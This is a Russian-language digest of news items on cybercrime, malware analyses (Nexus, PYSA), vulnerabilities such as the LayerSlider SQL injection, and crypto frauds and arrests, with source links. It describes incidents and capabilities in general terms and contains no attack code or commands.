По данным полиции города, которая занимается расследованием дела, хакеры смогли взломать платёжный шлюз целевой компании и получить доступ к её базе данных. Манипулируя этой базой, киберпреступникам удалось каким-то образом значительно увеличить остаток на вышеупомянутом счёте и похитить деньги, совершив множество небольших транзакций на разные банковские счета, чтобы передвижение средств было труднее отследить.
Сотрудники компании обнаружили нарушения в своих дебетовых и кредитных счетах 14 апреля этого года. «После тщательного расследования руководство компании выяснило, что их финансовый портал был взломан», — рассказали в полиции.
Самое интересное в этой истории то, что спустя несколько дней хакеры ещё раз провернули свою мошенническую схему, тем самым ещё больше увеличив убытки строительной компании.
Офицер из полицейского участка Шринагар сообщил, что хакеры создали четыре фиктивные компании, которые использовались как посредники для перевода средств. Некоторые из этих транзакций были остановлены после жалобы в Национальную корпорацию платежей Индии, но к тому моменту большая часть переводов уже была совершена.
Полиция ведёт расследование с целью выявить виновных, а обнаруженные уязвимости в банковской системе поспособствуют укреплению кибербезопасности индийских предприятий в будущем.
source: the420.in/thanes-biggest-cyber-theft-hackers-swipe-rs-25-crore-from- companys-escrow-account
На сервисе, созданном на основе банковского трояна для Android, ввели новые правила. В частности, клиентам запрещается использовать Nexus в атаках на территории стран, ранее входивших в состав СНГ.
Проведенный в Cleafy анализ образцов мобильного зловреда подтвердил, что он обладает всеми функциями для угона аккаунтов онлайн-банкинга и криптосервисов. Он умеет применять оверлеи, регистрировать клавиатурный ввод, воровать 2FA- коды из СМС, а также сид-фразы, открывающие доступ к кошелькам.
Криминальный сервис работает по модели MaaS (Malware-as-a-Service, вредонос как услуга); стоимость аренды трояна, по меркам черного рынка, сильно завышена — $3000 в месяц. В настоящее время список банковских приложений, атакуемых Nexus, включает 450 позиций.
Данные телеметрии показали, что новобранца начали использовать в реальных атаках задолго до официального запуска MaaS-сервиса (27 января). Первые всплески активности, связанной с Nexus, были зафиксированы в середине прошлого года.
Географические ограничения, введенные владельцами банкера, были также реализованы в коде. Перед запуском основных функций вредонос выполняет preloadCheck(), чтобы удостовериться в том, что атака разрешена. В противном случае он просто завершает свой процесс.
Список стран, где Nexus откатывает заражение:
Азербайджан, Армения, Белоруссия, Казахстан, Киргизия, Молдавия, Россия, Таджикистан, Узбекистан, Украина, Индонезия.
Итальянские исследователи отметили и другие новые возможности зловреда: удаление входящих СМС, запуск / останов модуля кражи 2FA, самообновление (с этой целью Nexus периодически отправляет пинг-запрос на свой сервер).
Модуль шифрования данных, по всей видимости, находится в стадии разработки: в коде найдены строки отладочного текста, признаков применения соответствующей команды не обнаружено. Аналитики не исключают, что код был скопирован из исходников SOVA v5 по ошибке. Использование подобной функциональности на мобильных устройствах довольно бессмысленно, жертва сможет с легкостью восстановить данные из облака.
• Source: https://www.cleafy.com/cleafy-labs/nexus-a-new-android-botnet
Пользователь скачал фальшивое приложение из Google Play и потерял целое состояние.
В октябре 2021 года житель США Джейкоб Перлман загрузил из Google Play поддельное приложение криптокошелька «Phantom Wallet», за 4 месяца до того, как компания Phantom Technologies выпустила официальную версию кошелька для Android .
Скачанное приложение Phantom Wallet оказалось подделкой. И когда Перлман подключил свой настоящий кошелек Phantom Wallet к приложению, он потерял более $800 000. «Менее чем через 24 часа после загрузки фальшивого приложения «Phantom Wallet» из Google Play из настоящего кошелька Phantom Wallet Перлмана были украдены криптовалюты на сумму более $800 000, включая SAMO, USDC, ORCA и SOL, а также 4 дополнительных NFT», - рассказала адвокаты Перлмана в суде.
Иск Перлмана направлен на привлечение Google к ответственности за нарушение собственных гарантий в отношении методов обеспечения безопасности и условий обслуживания. В судебных документах также говорится, что 11 октября 2021 года Phantom предупредил о том , что на тот момент официального приложения Phantom Wallet не существовало. Тогда компания предостерегла пользователей от скачивания поддельных приложений и кражи криптовалюты.
Google заявляет, что приложения в Google Play безопасны, а также гарантирует в своих Условиях обслуживания наблюдение за своими услугами с разумной осторожностью.
Согласно иску, Google «нарушила собственные гарантии и Условия обслуживания, поскольку предложила пользователю мошенническое приложение и не предупредила Перлмана о том, что оно может быть небезопасным, а также не заблокировала загрузку приложения».
На просьбу прокомментировать корпорация Google ответила не сразу и запросила больше времени для ответа. Судья определил, что дело сложное и требует больше времени. Поэтому следующее заседание запланировано на следующую неделю.
Цель исследования заключалась в том, чтобы создать инструмент, который позволил бы упростить сбор данных в даркнете в больших масштабах.
Команда исследователей из университетов Аризоны, Джорджии и Южной Флориды разработала механизм на основе машинного обучения, который, по их словам, может решить более 94% загадок CAPTCHA на сайтах в даркнете.
Цель исследования заключалась в том, чтобы создать инструмент, который позволил бы сделать даркнет “более прозрачным” для изучения и упростить ИБ- экспертам сбор данных в даркнете в больших масштабах. Это позволило бы разработать более эффективные платформы киберразведки и превентивные меры для борьбы с утечками данных и прочими киберпреступлениями.
CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart, Полностью автоматизированный тест Тьюринга для различения компьютеров и людей) - тест для различения человека и компьютера. Его основная идея состоит в том, чтобы предложить такую задачу, которая легко решалась бы человеком, но была бы крайне сложна для компьютера.
Загадки CAPTCHA почти повсеместно присутствуют на ресурсах в “видимом” интернете, в “темной” сети они служат для защиты платформ от DDoS-атак конкурентов. Как правило, такие атаки осуществляются ботнетами, поэтому CAPTCHA является достаточно эффективной защитой. Сайты в даркнете реализуют собственный кастомный механизм CAPTCHA, что очень усложняет создание автоматизированного инструмента, эффективного для решения всех загадок.
Для решения этой проблемы специалисты разработали систему под названием DW- GAN, интерпретирующую рестеризованные изображения. Новый инструмент может различать буквы и цифры (исследуя их по одной), убирать шум в изображении, определять границы между буквами и сегментировать контент в отдельные символы, при этом размер CAPTCHA не имеет значения.
Для распознавания символов система использует образцы, извлеченные из различных локаций. Механизм идентифицирует линии и углы, поэтому обмануть его, меняя местами символы, размер шрифта и его цвет, довольно сложно.
Исследователи протестировали систему на примере уже несуществующего даркнет- рынка Yellow Brick, предлагавшего нелегальные товары, в частности украденные кредитные карты, взломанные учетные записи и пр. В ходе эксперимента система смогла за 76 минут решить загадки CAPTCHA на 1 831 странице продукта.
Исследователи опубликовали финальную версию инструмента на GitHub, но не предоставили набор данных из 50 тыс. изображений CAPTCHA, используемый для обучения системы.
source: arxiv.org/pdf/2201.02799.pdf | github.com/johnnyzn/DW-GAN
По данным Google Project Zero, сразу четыре уязвимости нулевого дня в Android использовались хакерами, прежде чем были исправлены в начале этого месяца. В бюллетене безопасности от 3 мая изначально не сообщалось, что какие-то уязвимости могут находится под атаками. Очевидно, разработчики давали производителям больше времени на выпуск и распространение патчей среди пользователей.
Обновленная теперь версия бюллетеня гласит, что четыре проблемы «могут подвергаться ограниченной целевой эксплуатации». Google не приводит никаких подробностей об этих атаках, лишь перечисляет идентификаторы CVE для четырех уязвимостей: CVE-2021-1905, CVE-2021-1906, CVE-2021-28663 и CVE-2021-28664.
Все эти баги связаны с прошивками GPU, причем две ошибки влияют на драйвер графического процессора Arm Mali, а две другие — на графический компонент Qualcomm. [Qualcomm](https://www.qualcomm.com/company/product- security/bulletins/may-2021-bulletin) и [Arm](https://developer.arm.com/support/arm-security-updates/mali-gpu-kernel- driver) уже опубликовали дополнительную информацию о каждой уязвимости, а также рекомендации по безопасности. Там же можно найти данные о том, какие чипсеты подвержены данным проблемам.
Патчи для этих уязвимостей — редкий случай, когда баги в Android эксплуатируются хакерами. Чаще для целевых атак хакеры используют баги iOS. Так, согласно электронной таблице, которую ведут аналитики Google Project Zero, с 2014 года только шесть 0-day багов, связанных с Android, находились под атаками, при этом четыре свежих ошибки входят в их число.
В прошлом году исследователи из израильской компании ClearSky рассказали о хакерской группе CryptoCore, активной с 2018 года и специализирующейся на взломе криптовалютных бирж. Эту группировку связывали как минимум с пятью успешными взломами, а также с попытками атак еще на 10-20 криптовалютных платформ. Так, пять подтвержденных жертв хакеров находятся в Соединенных Штатах, Японии и на Ближнем Востоке.
В итоге преступникам удалось «заработать» более 200 000 000 долларов на компрометации бирж и компаний в разных странах мира. Названия пострадавших компаний не разглашались из-за соглашений, которыми были связаны исследователи.

Тогда эксперты ClearSky пришли к выводу, что злоумышленник базируются где-то в странах Восточной Европы, таких как Украина, Россия и Румыния. Однако после публикации этого отчета другие ИБ-компании обнародовали результаты собственных расследований аналогичных атак и технические детали, которые соответствовали тактиками и методам CryptoCore.
В результате эксперты ClearSky подготовили новый отчет, в котором сравнили данные из вышеперечисленных исследований с собственными выводами. Оказалось, что все эти атаки можно с уверенностью приписать одной и той же преступной группе.
В сущности, исследователи согласились с выводами F-Secure, которая приписывает атаки известной северокорейской хак-группе Lazarus: эксперты использовали правила YARA и соотносили свои выводы с более ранними исследованиями ESET и «Лаборатории Касперского».
ClearSky пишет, что правило YARA соответствует старому RAT, о котором «Лаборатория Касперского» сообщала в 2016 году (bbd703f0d6b1cad4ff8f3d2ee3cc073c). Хотя это стало возможно только после изменения названия ресурса, которое отличалось от бэкдора 2016 года. Так, в старой версии малварь обращалась к файлу с именем scaeve.dat, а в новой версии к файлу perflog.dat. Изменение имени файла помогло правилу YARA обнаружить совпадение.
 
Суммарно в отчетах F-Secure, NTT Security и JPCERT/CC было обнаружено более 40 совпадающих индикаторов компрометации, а также скрипт VBS, который без обфускаци был практически одинаков.

Учитывая все эти сходства, исследователи ClearSky признают, что ошиблись в атрибуции год назад: теперь они уверены, что кампания CryptoCore имеет прямое отношение к северокорейской хакерской группе Lazarus.
Источник: xakep.ru/2021/05/26/cryptocore-lazarus/
Шестеро жителей штата Нью-Гемпшир были арестованы во вторник по обвинению в организации нелицензированной криптовалютной биржи, мошенничестве и отмывании денег.
Согласно обвинению, шестеро жителей Нью-Гемпшира организовали незаконный бизнес по обмену фиатной валюты на цифровые активы в 2016 году. Они получали прибыль с комиссий за обмен, который осуществлялся через криптоматы, расположенные в штате. В общей сложности было обменено более $10 млн.
Обвинения были предъявлены Яну Фриману (Ian Freeman), ранее известному как Ян Бернард (Ian Bernard), Коллину Фордхэму (Colleen Fordham), Рене Спинелле (Rene Spinella), Эндрю Спинелле (Andrew Spinella), Ричарду Полу (Richard Paul) и Арии ДиМеццо (Aria DiMezzo), ранее использовавшему имя Джеймс Бейкер (James Baker).
Для привлечения клиентов они использовали веб-сайты. Правоохранительные органы подчеркивают, что обвиняемые преднамеренно нарушали федеральные законы и правовые нормы. Для сокрытия источников средств некоторые из них открывали счета в банках и представляли деньги как религиозные пожертвования, а сами выдавали себя за работников религиозной организации.
Парижский аукционный дом Kapandji Morhange 17 марта выставит на аукционе 611 BTC. Компания заявляет, что это первый аукцион по продаже BTC, конфискованных правительством Франции. Текущая стоимость этих биткоинов составляет около $34 млн.
Согласно информации на сайте аукционного дома, 17 марта будут проведены две продажи: первая начнется в 9:00, а вторая в 14:00. В первую продажу войдут 437 лотов от 0.11 до 2 BTC. В рамках второй части аукциона будут продан 41 лот от 5 до 20 BTC.
Биткоины были изъяты у хакеров в 2019 и 2020 годах и находятся под контролем Агентства по возврату и управлению арестованными и конфискованными активами (AGRASC) Франции. Как сообщает издание Cyberguerre, большинство выставленных на аукцион BTC были конфискованы судами в связи с атакой на криптовалютную платформу Gatehub в 2019 году.
Судебное разбирательство по взлому Gatehub еще продолжается, и обвиняемым не был вынесен приговор. Если их признают невиновными, они получат выручку от продажи BTC. После завершения аукциона выручка от продажи будет переведена на счет Caisse des Dépôts et Consignations до завершения судебного процесса.
Какой-то печальный выдался в этом году октябрь. То Flibusta умирает, то Linus / Linux преподносит неприятные сюрпризы, Internet Archive взломали, а теперь ещё и CodeProject. Вот такое сообщение администрации CodeProject появилось в середине октября:
**CodeProject.com меняется
Нашим многочисленным друзьям, участникам сайта и клиентам:**
Технологический кризис серьёзно ударил по нашим клиентам, а значит, и по CodeProject.
После почти двух лет значительных финансовых потерь мы были вынуждены закрыть бизнес, стоявший за CodeProject.com, CodeProject Solutions Inc.Мы прилагали невероятные усилия, чтобы избежать этого, и, несмотря на все наши усилия и огромные финансовые вливания для преодоления кризиса, нам не удалось этого неизбежать.
В ближайшее время сайт будет переведён в режим только для чтения. Мы надеемся, что это изменение позволит другой стороне поддерживать сайт как архив отличного кода, статей и технических советов. Мы упорно работаем над тем, чтобы это произошло, и хотя гарантий нет, пока всё выглядит многообещающе. Однако в обозримом будущем, а возможно и навсегда, публикация новых материалов будет отключена для статей, форумов, QuickAnswers и других разделов сайта.
Мы очень гордимся тем, что были частью сферы разработки программного обеспечения на протяжении последних 25 лет, и тем, что помогли многим разработчикам освоить новые технологии и навыки, поддерживали наших клиентов в представлении новых продуктов и услуг и, пусть и в небольшой степени, способствовали формированию будущего разработки.
Спасибо, что были частью этого пути вместе с нами.Некоторые люди строили догадки о том, что происходит, обсуждая, что Крис и Дэвид якобы "прибрали к рукам" деньги через продажу и прочее.
Мы можем с полной честностью сказать вам, что все, кто был причастен к CodeProject, понесли значительные финансовые убытки, делая всё возможное для поиска решения.Крис, Дэвид и команда CodeProject.com
Click to expand...
Две недели назад, с утра просматривая сайты, наткнулся на следующую плашку:
CodeProject is currently being upgraded by our crack team of SysAdmins. These guys are professionals. What could possibly go wrong?
Click to expand...
Что это было? Взломали? И лишь через неделю увидел сообщение от администрации. Честно говоря для меня эта новость стала ушатом ледяной воды.
CodeProject был чем-то вроде универсального швейцарского ножа если надо было быстро войти в новую технологию:
Были, конечно, и минусы, но где их нет:
Хабр в общем-то и остаётся. Наличие ленты с ограниченной, но, тем не менее, удобной фильтрацией. Адекватная модерация (я не набрасываю, это действительно так). Адекватное размещение статей. Да, с редактором приходится вести неравный бой, но оно того стоит. Множество тем, даже не имеющих ничего общего с IT, но держащих в курсе событий.
В принципе, ничего так, только его бо́льшая ориентированность на пользователей мобильных устройств оставляет свой негативный след - там вы не найдёте развёрнутых статей, а только коротенькие ошмётки знаний и толпы троллей в комментариях. Да и найти что-либо на Reddit весьма проблематично.
Туда ни разу не писал, но судя по поисковой выдаче, может стать годной заменой.
Ответы на конкретные вопросы, ничего лишнего. В качестве обучающего сайта не подходит.
Отличная идея хостинга исходников, но всё же не то. Много интересных проектов содержат минимум объяснений. Такие проекты не прошли бы модерацию на CodeProject, и авторов попросили бы добавить объяснений.
Разработчики блокчейн-казино ZKasino отправили 10 515 ETH на сумму $33,9 млн в протокол стейкинга Lido вместо возврата этих средств пользователям и инвесторам.
Ethereum депонировали ранние участники проекта через мост для фарма нативного токена ZKAS. Команда проекта обещала, что они смогут вернуть отправленные активы.
Однако в сообщении от 20 апреля ZKasino объявило о запуске сети и «внесении изменений в первоначальный план». Все полученные ETH платформа якобы конвертировала в ZKAS «по сниженной ставке $0,055» с 15-месячным вестингом.
«Это преобразование сделано в качестве одолжения нашим пользователям, которые присоединились к экосистеме», — говорится в блоге.
Click to expand...
Разработчики также изменили формулировку на своем веб-сайте, удалив заявление, в котором говорилось о возврате ETH.
Внимание на подозрительный перевод средств на Lido обратили аналитики EmberCN.
8 小时前,ZKasino 将用户桥接存入 ZKasino 的 10,515 ETH($33.18M) 转移到 0x791 多签地址,然后存进 Lido 生息去了 https://t.co/k15pZ8a6DW
这些 ETH 是用户桥接存入 ZKasino 挖矿,结果 ZKasino 项目方一招修改官网说明,强行将用户存款的 ETH 换成了他们的平台代币 pic.twitter.com/1F9OUPB5Pt
— 余烬 (@EmberCN) April 21, 2024__https://twitter.com/x/status/1781887330531561832
Click to expand...
«ETH вносили пользователи ZKasino для фарминга. В результате команда проекта изменила официальное описание сайта и принудительно обменяла ETH на токен их платформы», — объяснили исследователи.
Web3-разработчик под ником cygaar рассказал, что запущенный ZKasino представляет собой «цепочку Arbitrum Nitro, развертывание которой заняло две минуты». Кроме того, протокол не использует доказательство с нулевым разглашением и EigenDA, несмотря на заявления команды.
The funniest part of the Zkasino drama is that the chain they released has no zk tech in it at all (nor does it use EigenDA).
It's an Arbitrum Nitro chain that took 2 minutes to deploy.
They put ZERO effort into scamming everyone lmao. pic.twitter.com/VkKYZWttGl
— cygaar (@0xCygaar) April 21, 2024__https://twitter.com/x/status/1782043339744809044
Click to expand...
Параллельно инвесторы и пользователи платформы X оставили множество сообщений с предупреждением о скаме. Венчурная фирма Big Brain написала, что никогда не инвестировала в ZKasino, а сам проект кажется ей мошенническим.
Big Brain Holdings invested into the @zigzagexchange project in 2022, which subsequently resulted in financial losses for us. Some of the previous founders of that project are now part of the @ZKasino_io team, which appears to be fraudulent.
We have never invested in ZKasino…
— Big Brain Holdings (@BigBrainVC) April 21, 2024__https://twitter.com/x/status/1782024980013703594
Click to expand...
«Big Brain Holdings инвестировала в ZigZag Exchange в 2022 году, что впоследствии обернулось для нас финансовыми потерями. Некоторые из соучредителей этого проекта теперь являются частью команды ZKasino, которая выглядит нечистой на руку», — отметили в компании.
В одном из тредов предполагаемый основатель ZKasino под ником Derivatives Monke ответил на сообщение пользователя о том, что на него «подадут в суд за кражу $30 млн».
You're a 60 year old boomer hanging out with 20 year old kids.
— Derivatives Monke (@Derivatives_Ape) April 20, 2024__https://twitter.com/x/status/1781786712764494010
Click to expand...
«Ты 60-летний бумер, тусующийся с 20-летними детьми», — написал он.
Других заявлений касательно сложившейся ситуации команда ZKasino не делала.
sc:
etherscan.io/tx/0xd6fa04a3465bd81d4df7e4f51c0ea9ecbc3264ef950cbc4a519caa642a217402
zkasino.medium.com/the-zkasino-network-goes-live-f39dfa1f740a
web.archive.org/web/20240404163458/https://bridge.zkasino.io/
twitter.com/ZKasino_io/status/1765044699587342540
Критическая уязвимость (SQL-инъекция) в популярном плагине LayerSlider для WordPress могла использоваться для извлечения конфиденциальной информации из баз данных, например, хешей паролей.
LayerSlider представляет собой инструмент для создания слайдеров, галерей изображений и анимации на сайтах под управлением WordPress. Плагин используется примерно на миллионе сайтов.
Проблема, получившая идентификатор CVE-2024-2879 и оценку 9,8 балла по шкале CVSS, описывается SQL-инъекция, затрагивающая все версии плагина с 7.9.11 по 7.10.0. Уязвимость была обнаружена ИБ-исследователем AmrAwad и устранена в версии 7.10.1, выпущенной 27 марта 2024 года. За ответственное раскрытие и обнаружение уязвимости специалист получил вознаграждение в размере 5500 долларов.
Как сообщают эксперты [Wordfence](https://www.wordfence.com/blog/2024/04/5500-bounty-awarded-for- unauthenticated-sql-injection-vulnerability-patched-in-layerslider-wordpress- plugin/), проблема позволяла злоумышленникам извлекать конфиденциальные данные из БД уязвимых сайтов, что угрожало утечкой информации или полной компрометацией ресурса.
Уязвимость была связана с обработкой параметра id в функции плагина ls_get_popup_markup. Так как должная обработка параметра id не проводилась, атакующие могли внедрить вредоносный SQL-код в специально подготовленные запросы, что приводило к выполнению команд.
Структура возможных запросов сводила возможную атаку к слепой SQL-инъекции по времени, то есть злоумышленникам необходимо было наблюдать за временем отклика, чтобы получить данные из БД. Но, несмотря на эти ограничения, CVE-2024-2879 все равно позволяла извлекать информацию из БД, не требуя аутентификации.
Wordfence объясняет, что проблема усугублялась тем, что запросы подготавливались без помощи функции $wpdb->prepare(), которая предотвращает SQL-инъекции, гарантируя, что пользовательский ввод будет очищен перед использованием в запросах к базе данных.
Сервис мониторинга данных Open Data Bot подсчитал количество задекларированных криптовалютных кошельков, находящихся в распоряжении чиновников на Украине. По итогам 2022 года выяснилось, что каждым четвертым из 1428 аккаунтов владеют сотрудники силовых структур.
«Больше всего владельцев цифровых денег в 2022 году оказалось в Нацполиции — 171 (12 процентов) и прокуратуре — 150 (10,5 процентов). До начала полномасштабных боевых действий чаще всего криптовалюту декларировали чиновники из городских советов — 75 (9,5 процента)», — сказано в отчете.
Теперь же местные власти отошли в списке на третью позицию. На их представителей приходится лишь 7,6 процента задекларированных чиновниками кошельков. Стоит отметить, что лишь 20 кошельков набралось на всю Верховную раду Украины, 8 — во всем Министерстве обороны. Наиболее популярна криптовалюта у чиновников Одесской, Харьковской и Днепропетровской областей.
«Самой популярной криптовалютой остался биткоин — его в 2022 году задекларировали 648 чиновников. Это 45 процентов от общего количества деклараций. К сравнению, в 2021 году биткоин упоминался в 356 декларациях», — заключили авторы исследования.
sc: opendatabot.ua/analytics/crypto-geo-2023
Специалисты швейцарской ИБ-компании PRODAFT опубликовали результаты 18-месячного исследования, посвященного кибервымогательской группировке PYSA.
PYSA (аббревиатура выражения «Protect Your System, Amigo» – «Защищай свою систему, друг») является наследником вымогательского ПО Mespinoza. Вредонос был впервые обнаружен в декабре 2019 года и в последнем квартале 2021 года являлся четвертым в списке наиболее часто использующихся программ-вымогателей.
С сентября 2020 года группировка похитила конфиденциальную информацию у 747 жертв. В январе 2022 года ее серверы были отключены.
По данным Intel 471, большинство жертв находится в США (59,2% от всех атак PYSA) и Великобритании (13,1%). Чаще всего PYSA атаковала правительственные, образовательные и здравоохранительные организации.
Подобно другим кибервымогательским группировкам, PYSA использовала тактику двойного вымогательства – публиковала похищенные файлы жертвы, если она отказывалась платить выкуп.
Вредонос шифровал файлы, добавляя расширение .pysa. Для их расшифровки требовался закрытый RSA-ключ, получить который можно было, только заплатив выкуп вымогателям. Почти 58% жертв, заплативших требуемую сумму, смогли восстановить доступ к своим файлам.
Специалистам PRODAFT удалось обнаружить публично доступную папку .git, управляемую операторами PYSA, и выяснить логин одного из авторов проекта – dodo@mail.pcc .
В операции PYSA использовалось как минимум 11 учетных записей, большинство из которых были созданы 8 января 2021 года. 90% всей активности в панели управления вредоносом приходилось на четыре учетные записи – t1, t3, t4 и t5.
В инфраструктуру PYSA также входили контейнеры docker, включая публичные серверы утечек, базы данных и управляющие серверы, а также облако Amazon S3 для хранения зашифрованных файлов.
«Группировка поддерживается компетентными разработчиками, применяющими к циклу разработки современные операционные парадигмы. Это указывает на профессиональную среду с хорошо организованным распределением обязанностей, а не плохо связанную сеть полуавтономных хакеров», – сообщили исследователи.
source: prodaft.com/resource/detail/pysa-ransomware-group-depth-analysis | thehackernews.com/2022/03/nearly-34-ransomware-variants-observed.html
В результате спецоперации Lyrebird, проведенной Интерполом, в Марокко был арестован хакер, известный под ником Dr Hex. Его обвиняют в преступлениях 12-летней давности, включая дефейсы сайтов, фишинговые атаки и распространение вредоносного ПО. Некоторые атаки были нацелены на на французские телекоммуникационные компании, банки и транснациональные корпорации.
Group-IB, приняла участие в спецоперации Интерпола «Lyrebird», в результате которой был задержан киберпреступник, стоявший за многочисленными атаками, нацеленными в том числе на французские телекоммуникационные компании, банки и транснациональные корпорации. Расследование длилось два года и благодаря данным, полученным от Group-IB, злоумышленник, оказавшийся гражданином Марокко, в мае был задержан местной полицией.
По данным специалистов Threat Intelligence Group-IB, киберпреступник, известный под псевдонимом Dr HeX, начал вести свою деятельность еще в 2009 году. На его счету — многочисленные преступления, связанные с фишингом, дефейсом сайтов, разработкой вредоносного программного обеспечения, мошенничеством и кражей данных банковских карт, а количество жертв исчисляется тысячами. Расследование Group-IB началось после того, как система Group Threat Intelligence & Attribution, обнаружила фишинг-кит — «конструктор» для массового создания фишинговых сайтов, который использовался для атаки на крупный французский банк.
Работа фишинг-кита осуществлялась по стандартной схеме: после создания фишинговой страницы сайта жертвы, происходила массовая рассылка электронных писем якобы от лица этой компании с просьбой к пользователям пройти по ссылке и ввести на сайте — фишинговом, разумеется — свои учетные данные, которые в конечном итоге уходили на электронную почту злоумышленника. Почти в каждом из скриптов, содержащихся в фишинговом наборе, фигурировал Dr HeX и его контактный адрес электронной почты.
Именно электронная почта, которая содержалась в фишинг-ките, позволила аналитикам Threat Intelligence Group-IB найти канал злоумышленника на YouTube, зарегистрированный под ником Dr HeX. В описании к одному из видеороликов преступник оставил ссылку на арабскую краудфандинговую платформу, которая позволила специалистам Group-IB выйти на другой псевдоним, связанный с киберпреступником. Анализ данных DNS, выявил, что ник использовался для регистрации как минимум двух доменов, которые были созданы с использованием электронной почты из фишинг-кита.
Используя запатентованную технологию графового анализа сетевой инфраструктуры, эксперты Group-IB построили сетевой граф на основе адреса электронной почты, упомянутого в наборе для фишинга. В результате проведенного анализа, Group-IB удалось обнаружить другие элементы вредоносной инфраструктуры злоумышленника, которые он использовал в различных кампаниях. Всего было идентифицировано пять адресов электронной почты преступника, шесть псевдонимов и его учетные записи в Skype, Facebook, Instagram и Youtube.
Дальнейший анализ цифрового следа Dr Hex выявил его связь с другими
преступлениями. За период с 2009 по 2018 год злоумышленник осуществил дефейс,
то есть взлом сайта с целью замены одной или нескольких страниц, более 130
веб-страниц. Аналитики Group-IB также обнаружили публикации киберпреступника
на нескольких популярных подпольных форумах, предназначенных для торговли
вредоносным ПО. Данная информация указывает на то, что преступник занимался
разработкой вредоносных программ. Кроме того, Group-IB обнаружила
доказательства, свидетельствующие о его причастности к атакам на несколько
крупных французских корпораций с целью кражи данных банковских карт клиентов.
В рамках операции «Lyrebird» Group-IB тесно сотрудничала с управлением по
борьбе с киберпреступностью Интерпола и с марокканской полицией при поддержке
национального центрального бюро Интерпола в Рабате, что, в конечном счете,
позволило найти и задержать злоумышленника, который на данный момент находится
под следствием.
Это огромный успех: проведено расследование в отношении лица, которое обвиняется в причастности к многочисленным кибератакам, жертвами которых стали ничего не подозревающие люди и компании в нескольких регионах мира. Злоумышленник занимался преступной деятельностью на протяжении нескольких лет. Этот случай в очередной раз подчеркивает, что киберпреступления являются угрозой глобального масштаба. Арест подозреваемого стал возможен благодаря выдающейся работе следователей и сотрудничества, как с марокканской полицией, так и с нашими партнерами из частного сектора, среди которых — Group-IB, — говорит исполнительный директор Интерпола Стивен Каван.
В основе нашей философии нулевой терпимости к киберпреступлениям находится тезис о том, что необходимо не только защитить клиента от угроз, но и добиться того, чтобы злоумышленник, стоящий за этими преступлениями, был задержан и понес справедливое наказание. Операция Lyrebird является еще одним примером тесного, скоординированного сотрудничества между региональной полицией, международными правоохранительными органами и частными компаниями, работающими в сфере кибербезопасности. Именно международное сотрудничество, обмен информацией и многолетний опыт расследований в сфере киберпреступности, помогают Group-IB доводить свою работу до конца и добиваться того, чтобы преступники предстали перед лицом правосудия. Успешное сотрудничество между Интерполом и Group-IB, длящееся вот уже несколько лет, показывает, что благодаря взаимодействию между частными компаниями и полицией, киберпреступникам не удастся избежать наказания — Group-IB, — говорит Дмитрий Волков технический директор и глава киберразведки
• Source: group-ib.ru/media/gib-interpol-lyrebird
• Source: interpol.int/News-and-Events/News/2021/Moroccan-police-arrest- suspected-cybercriminal-after-INTERPOL-probe
В интервью CBSNews президент Microsoft Брэд Смит (Brad Smith) заявил, что недавняя атака на SolarWinds была «самой крупной и самой изощренной, которую он когда-либо видел». По его словам, анализ взлома, проведенный специалистами компании, позволяет предположить, что над этой атакой работали более 1000 разработчиков. При этом Смит говорит, что злоумышленники переписали всего 4032 строки коде в Orion, который содержит миллионы строк кода.
Напомню, что в декабре 2020 года стало известно, что неизвестные злоумышленники атаковали компанию SolarWinds и заразили ее платформу Orion малварью. Согласно официальным данным, среди 300 000 клиентов SolarWinds только 33 000 использовали Orion, а зараженная версия платформы была установлена примерно у 18 000 клиентов. В результате среди пострадавших оказались такие гиганты, как Microsoft, Cisco, FireEye, а также множество правительственных агентств США, включая Госдеп и Национальное управление по ядерной безопасности.
Смит рассказал, что над анализом этого инцидента работают более 500 инженеров Microsoft, однако на стороне злоумышленников «трудилось» куда больше специалистов:
«Когда мы проанализировали всё, что обнаружили в Microsoft, мы спросили себя, сколько инженеров могли работать над этими атаками? Полученный нами ответ: ну, явно больше тысячи».
Click to expand...
Так как атаку приписывают предположительно русскоязычной хак-группе, которую ИБ-эксперты отслеживают под названиями StellarParticle (CrowdStrike), UNC2452 (FireEye) и Dark Halo (Volexity), Смит также сравнил взлом SolarWinds с атаками на Украину, которые часто приписывают России (хотя власти РФ отрицают свою причастность).
Глава компании FireEye Кевин Мандиа (Kevin Mandia) тоже пообщался с журналистами и рассказал о случившемся. Как оказалось, в FireEye компрометацию обнаружили практически случайно. Дело в том, что для удаленного входа в VPN компании сотрудникам нужен код двухфакторной аутентификации, и их аккаунты привязаны к номерам телефонов. В службе безопасности FireEye случайно заметили, что один из работников привязал к своей учетной записи два номера телефона. Когда этому человеку позвонили и поинтересовались, действительно ли у него два номера или устройства, тот ответил, что не делал ничего подобного. Оказалось, второй номер привязали к учетной записи злоумышленники.
Источник: xakep.ru/2021/02/16/1000-devs-for-solarwinds/
Суд Южного округа Нью-Йорка приговорил соучредителя международной криптовалютной пирамиды AirBit Club Пабло Ренато Родригеса к 12 годам тюрьмы с возможностью условно-досрочного освобождения через три года.
Согласно материалам дела, в 2015 году Родригес совместно с Гутембергом Дос Сантосом создали схему по привлечению наличных средств, обещая ежедневные доходы от инвестиций в торговлю криптовалютами и майнинг. Промоутеры продвигали AirBit Club по всему миру посредством дорогостоящих презентаций.
В личных кабинетах пользователи могли видеть растущие балансы, однако это было фикцией. Тем, кто пытался вывести средства, организаторы схемы предлагали выплатить комиссию в размере 50% от запрашиваемой суммы. Некоторые вкладчики жаловались, что столкнулись с закрытием счетов якобы по причине «финансового кризиса, вызванного коронавирусом».
Родригес, Дос Сантос и трое их подельников — Скотт Хьюз, Сесилия Миллан и Карина Чайрес — отмывали полученные средства через криптовалюты, трастовые счета и фиктивные компании, в дальнейшем используя их для личных нужд.
Совокупные мошеннические доходы от AirBit Club составили примерно $100 млн. Эти активы суд намерен конфисковать.
В частности Родригес, помимо тюремного срока, обязан выплатить $65 млн компенсации и передать в доход государства ~$1 млн со счетов компании, на балансе которой находился его самолет Gulfstream Jet, 3822,98 BTC (более $100 млн на момент написания), $896 483 наличных, резиденцию в Калифорнии, а также различные часы и ювелирные изделия.
Дос Сантос, Хьюз, Миллан и Чайрес признали вину в мошенническом сговоре с использованием электронных средств связи, заговоре с целью отмывания денег и для осуществления банковского мошенничества. Совокупное максимальное наказание по трем пунктам составляет 70 лет тюрьмы. Сейчас они ожидают вынесения приговора.
Напомним, в 2019 году AirBit Club стала одной из крупнейших пирамид в РФ. По данным Банка России, в нее было вовлечено около 60 000 человек, а сумма вложений превысила 500 млн рублей.
